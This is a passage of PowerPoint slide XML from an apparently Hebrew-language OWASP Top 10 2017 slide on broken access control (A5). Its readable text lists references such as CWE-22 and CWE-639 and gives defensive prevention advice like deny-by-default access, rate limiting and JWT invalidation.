                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DELETE</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8620" y="6372000"/>
            <a:ext cx="3383280" cy="2761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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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5"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Access Controls</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6"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard: V4 Access Control</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7"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Authorization Testing</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8"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות חיצוניות</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>CWE-22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</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10"/>
              </a:rPr>
              <a:t>CWE-284: Improper Access Control (Authorization)</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11"/>
              </a:rPr>
              <a:t>CWE-285: Improper Authorization</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12"/>
              </a:rPr>
              <a:t>CWE-639: Authorization Bypass Through User-Controlled Key</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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>PortSwigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>: Exploiting CORS Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8620" y="3131840"/>
            <a:ext cx="3383280" cy="316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46800" bIns="36000" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>כיצד למנוע את הסיכון</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>בקרת גישה יעילה אך ורק כאשר היא נאכפת בצד השרת או ממשק פיתוח (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) ללא-שרת, כאשר התוקף אינו יכול לשנות את בקרות הגישה או ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>metadata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>למעט עבור משאבים ציבוריים, חסום גישה כברירת מחדל</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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יישם מנגנוני בקרת גישה פעם אחת והשתמש בהם בכל מקום ביישום, לרבות צמצום השימוש ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CORS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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היישום של בקרת הגישה צריך לאכוף הרשאה על רשומה, במקום לקבל את העובדה שמשתמש עשוי ליצור, לקרוא, לעדכן או למחוק כל רשומה.</a:t>
            </a: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הדרישות להגבלת יישומים עסקיים ייחודיים צריכות להיאכף ע"י </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>domain models</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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בטל את היכולת לצפות במבנה תיקיות עבור שרתי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> וודא כי ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>metadata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> של הקבצים (דוגמת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) וקבצי הגיבוי לא מצויים בתיקיית ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>של שרת ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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תעד ניסיונות גישה כושלים, יידע מנהלי מערכת כשרלוונטי (דוגמת כישלונות חוזרים).</a:t>
            </a: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יישם יכולות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rate limit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> לממשקי הפיתוח (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) ובקרת הגישה על-מנת לצמצם את הנזק של כלי תקיפה ממוכנים.</a:t>
            </a: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חסום </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JWT tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> לאחר הניתוק מהשרת.</a:t>
            </a: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מפתחים ואנשי בדיקות צריכים להוסיף בקרות גישה בתהליך הבדיקות.</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr tIns="216000" bIns="36000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>A5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  בקרת גישה שבורה</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3184545227"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="2102400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1396800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1404000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1011600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="554400">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="288000">
                <a:tc>
                  <a:txBody>
